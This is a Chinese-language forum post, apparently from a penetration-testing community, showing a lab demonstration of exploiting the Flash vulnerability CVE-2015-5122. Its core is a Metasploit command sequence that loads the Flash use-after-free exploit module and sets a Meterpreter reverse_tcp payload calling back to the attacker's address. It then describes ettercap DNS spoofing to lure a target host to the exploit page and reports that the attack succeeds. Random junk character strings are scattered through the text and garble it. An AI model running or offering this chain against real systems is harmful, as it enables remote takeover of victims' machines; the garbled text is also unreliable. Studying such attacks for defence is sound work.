$ z8 D) H5 R7 x' q 二、cve2015-5122漏洞实例演示虚拟机
5 A n$ I) `1 L3 }关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: , Q' u3 }+ S: x- ^
2 n$ k; {( e' K. j. _2 X- D8 a) V6 T7 E6 @ U' Q9 S: e search cve-2015-5122如图: " F7 d* t. U# {# Z) V( E L$ t
, P# s% A4 Z. Z# G9 I7 {. c6 D% O; ?2 p, p: t
1 o2 j; ]- z% `/ ^下面我们敲如下命令: [# |6 j! n1 G0 `! _ e$ G" k
3 V( j" E5 f! {: X0 `! R use exploit/multi/browser/adobe_flash_opaque_background_uaf
7 J. L' F! F2 [7 W0 b7 ^set PAYLOAD windows/meterpreter/reverse_tcp
0 U* ]: Q% w6 X s) Zset LHOST 192.168.0.109
! p6 H6 `4 g5 s0 G. [ set URIPATH / /*根目录*/
! E% ~9 G& }& H6 X8 q* [( [0 A) {set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 7 Y0 Q m0 N) N" D: D8 Q
4 P* P; W, T# H- ~, B( E- g7 K" x- }& r 然后show options如图:
- k% L: |) I( d& d
, |1 x% v. n' Y, ~; ?" t* H4 z M6 q
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
4 P# O. b2 \+ u
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 ' H k- z5 {+ h. f
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf - D7 K2 x& e! @) e; m. P
, ~' U! S0 k7 p% u1 z5 x7 d0 T) F1 W3 W N% C. Z% `* o
成功了,这时候我们断开ettercap,如图:
; F( |0 @$ @* m2 g, ^6 j4 W$ r# [0 \( T4 z1 z! z
$ Z2 j& k2 [$ |, k# Y; |, N Screenshot如图: 5 ?5 R7 p/ G- i
$ \) S0 N- s+ y; h: L* U0 B
7 ?" V7 q) q+ l" L. B p : [+ v/ B. x' O G/ X* e: f+ L8 I
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |